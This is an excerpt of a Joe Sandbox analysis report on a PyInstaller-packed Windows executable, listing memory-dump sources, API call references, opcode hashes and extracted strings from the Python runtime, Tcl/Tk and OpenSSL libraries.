                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: listen
                                                                                                                                                                                                                              • String ID: |i:listen
                                                                                                                                                                                                                              • API String ID: 3257165821-1087349693
                                                                                                                                                                                                                              • Opcode ID: d73e7bed6c837c4b4ef10a9ebc127bc551d6f2eb05c53b64dd527b498aa8359c
                                                                                                                                                                                                                              • Instruction ID: 4dd1cdb1b243cad1a3cfe94d51c134117736e7c18afae45ccf24a77a0b873f6e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d73e7bed6c837c4b4ef10a9ebc127bc551d6f2eb05c53b64dd527b498aa8359c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C010021A18B4292EB709B66E88416E7361FFC9BA1B184136DA8E43F34EF3CD4448740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315830
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315842
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315879
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31588B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158A4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158B6
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158CF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158E1
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3158FD
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31590F
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31592B
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31593D
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315959
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A31596B
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315987
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A315999
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159B5
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A3164BF,?,00007FF79A31336E), ref: 00007FF79A3159C7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                              • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction ID: 7774e550fba4a19efac0ed499f34c5a1cf86634025bda278acaaa905111b6cda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE227D24E0FB0791FA75FF75A8582B4F2A0AF04785FC591BDD82E02660EF7CA5588360
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                              • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction ID: 91494cfba7f4e63e61bf467b69067d628a989dfdd0d1ab00133d375846eab0a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC028024E0FB0791FA75FF79A8545B4F2A1AF04795BC855BDE81E02260EF3CB5688630
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: htons
                                                                                                                                                                                                                              • String ID: %s(): AF_HYPERV address must be tuple, not %.500s$%s(): AF_HYPERV address service_id is not a valid UUID string$%s(): AF_HYPERV address vm_id is not a valid UUID string$%s(): AF_INET address must be tuple, not %.500s$%s(): AF_INET6 address must be tuple, not %.500s$%s(): bad family$%s(): flowinfo must be 0-1048575.$%s(): port must be 0-65535.$%s(): unknown Bluetooth protocol$%s(): unsupported AF_HYPERV protocol: %d$%s(): wrong format$O&i;AF_INET address must be a pair (host, port)$O&i|II;AF_INET6 address must be a tuple (host, port[, flowinfo[, scopeid]])$UU;AF_HYPERV address must be a str tuple (vm_id, service_id)
                                                                                                                                                                                                                              • API String ID: 4207154920-3631354148
                                                                                                                                                                                                                              • Opcode ID: ab1d2763ee5947802cd7eae6427d8dbca89c8f7812137385c8f5fa9b9c515d26
                                                                                                                                                                                                                              • Instruction ID: bf593b8f7506cd7416f670e96402d4e0baa003a5441aa0f7f97574ffbd6fe1de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab1d2763ee5947802cd7eae6427d8dbca89c8f7812137385c8f5fa9b9c515d26
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05C10672A08B46A6EB349F25D8401BD23A4FBC4BA8F584137DA4D57E64EF3DE549C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddrFreeInfo$getaddrinfoinet_pton
                                                                                                                                                                                                                              • String ID: 255.255.255.255$<broadcast>$address family mismatched$unknown address family$unsupported address family$wildcard resolved to multiple address
                                                                                                                                                                                                                              • API String ID: 3456548859-1715193308
                                                                                                                                                                                                                              • Opcode ID: c268de44e144db748cae579a5c7412c2584fce12479d65216c585f58c474ea65
                                                                                                                                                                                                                              • Instruction ID: e1fde98a8f7fcf294d53016e561c052d13eac5b926107adbc178e1bc497d7fdf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c268de44e144db748cae579a5c7412c2584fce12479d65216c585f58c474ea65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2717F61A08782A6F7308F25944027D63A4FBC9BA4F584237DA9D53EB5EF3CE596C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
                                                                                                                                                                                                                              • String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$getnameinfo() argument 1 must be a tuple$getnameinfo(): flowinfo must be 0-1048575.$si|II;getnameinfo(): illegal sockaddr argument$sockaddr resolved to multiple addresses$socket.getnameinfo$surrogatepass
                                                                                                                                                                                                                              • API String ID: 4001298222-243639936
                                                                                                                                                                                                                              • Opcode ID: c15fdad4632fc70716f215ee1c6e43032732167186f96be7e3c62b136f688b11
                                                                                                                                                                                                                              • Instruction ID: 96bc10ef78e8ee81eb8b9cc45709ce9e7ee04cbdefe2d9888ea781bfee885ef1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c15fdad4632fc70716f215ee1c6e43032732167186f96be7e3c62b136f688b11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7810C72A08B42A6E7308F65E8401AE77A0FBC4BA4F580137DA4D47A74EF7CE545CB40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF79A3188A7,?,?,00000000,00007FF79A313CBB), ref: 00007FF79A31821C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                              • Opcode ID: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                              • Instruction ID: 0595ed2eb929890cbe8ae08134201a7ca7fa476e6322efb337edb24ced814a44
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6fbdb188916104b0c2c5940302cfd80688c9116ecc918f500a0c860990a20752
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F518111E1FA4281FB71FB31E8512BAF250EF94784FC8497DEA0E826D5EE2CE4058764
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: 78d74902b445e6c4b5e58c3c3c530050e7d53b8d8c6d532e78062ed4c386ea27
                                                                                                                                                                                                                              • Instruction ID: 57a7ce00745ea4ec7df5c83e4442928506d51b162e536e70684c4233251c69a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78d74902b445e6c4b5e58c3c3c530050e7d53b8d8c6d532e78062ed4c386ea27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80516861F0A64292FA20FB71A4001B9F3A0BF84798FC445BEEE1D07796EE3CE5558760
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751324837.00007FFEDCBF1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCBF0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751293524.00007FFEDCBF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC73000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC75000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCC9D000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCA8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751324837.00007FFEDCCB3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751596856.00007FFEDCCB7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedcbf0000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007D6570
                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
                                                                                                                                                                                                                              • API String ID: 2111047089-1099454403
                                                                                                                                                                                                                              • Opcode ID: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
                                                                                                                                                                                                                              • Instruction ID: 79e1a81a24b0ed1e1497b37f6c33c67197dcdc1d98207ceb9ce467b151fb3974
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4fb00667328cc24e5a01ced80a969a7b37fcff98c645767f26b4f54dc518abc7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E417E32A58A0296EB108B18D95037C27A0EB44BD4F484437EB0EC3EB5DF7CE596D706
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1752010815.00007FFEDD271000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFEDD270000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1751967784.00007FFEDD270000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD281000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD283000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752010815.00007FFEDD286000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752157377.00007FFEDD287000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1752197756.00007FFEDD288000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ffedd270000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: OiII$Unknown Bluetooth protocol$iy#
                                                                                                                                                                                                                              • API String ID: 0-1931379703
                                                                                                                                                                                                                              • Opcode ID: ad3d843d10d7db7a4cd706e23c15f528697868bdde29bc38f6a75b948b8f6895
                                                                                                                                                                                                                              • Instruction ID: c51224ee5d3099873fa87bf5f6c81531039d487906c7439656c03b9f7abc7dfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad3d843d10d7db7a4cd706e23c15f528697868bdde29bc38f6a75b948b8f6895
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37511C61A1C652A2EB349B25E85417D63A4BFC5BB5F584133CA9E43EB4FF2CE446C300
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction ID: 13ef7a764b34b3ef9999af5a9d635282f5e369fb83412a475949f4e179058214
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26510626608BA186E6349F32A4181BAF7A1F798B65F404139EBDE43694DF3CD045CB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1750561032.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750522874.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750608323.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750649660.00007FF79A351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1750734524.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                              • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                              • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction ID: 943160455aeb8172fbd34ec377870683d2d11d3614ebec3616e78f1de3fd73d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE218B22F0EA4281F765AF7AA858179F250FF84B90FD8427DEA2D433D4DE2CD5918324
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1751719552.00007FFEDD231000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFEDD230000, based on PE: true
